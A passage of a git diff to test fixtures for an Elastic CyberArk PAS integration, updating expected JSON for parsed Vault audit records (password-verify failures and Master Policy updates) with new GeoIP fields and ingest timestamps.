\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=3;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"3\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615831516\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", @@ -1555,10 +1609,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "ELASTIC.local\\bart" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -1642,7 +1705,7 @@ "event": { "severity": 7, "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-12-09T13:37:01.193677300Z", + "ingested": "2021-12-14T14:42:29.505129467Z", "original": "\u003c7\u003e1 2021-03-16T09:50:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 02:50:19\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T09:50:19Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=4;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 02:50:19\",\"IsoTimestamp\":\"2021-03-16T09:50:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=4;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json index 3fecfee889a..92d9ca5895a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json 
@@ -58,7 +58,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-12-09T13:37:03.416577Z", + "ingested": "2021-12-14T14:42:31.833281936Z", "original": "\u003c5\u003e1 2021-03-11T16:31:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:31:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:31:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: False; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: True; RequireReason: AllowFreeTextReason: True, BasicValue: True; 
AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:31:13\",\"IsoTimestamp\":\"2021-03-11T16:31:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: False; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 
90; PSMEnabled: True; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" 
@@ -122,7 +122,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-12-09T13:37:03.416585700Z", + "ingested": "2021-12-14T14:42:31.833284435Z", "original": "\u003c5\u003e1 2021-03-11T16:31:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:31:23\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:31:23Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: True; RequireReason: AllowFreeTextReason: True, BasicValue: True; 
AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:31:23\",\"IsoTimestamp\":\"2021-03-11T16:31:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; 
PSMEnabled: True; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" 
@@ -186,7 +186,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-12-09T13:37:03.416591300Z", + "ingested": "2021-12-14T14:42:31.833284996Z", "original": "\u003c5\u003e1 2021-03-11T19:40:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:40:52\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:40:52Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: True; 
AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:40:52\",\"IsoTimestamp\":\"2021-03-11T19:40:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; 
PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" 
@@ -250,7 +250,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-12-09T13:37:03.416596700Z", + "ingested": "2021-12-14T14:42:31.833285387Z", "original": "\u003c5\u003e1 2021-03-14T12:04:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:04:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:04:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; 
AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:04:35\",\"IsoTimestamp\":\"2021-03-14T12:04:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; 
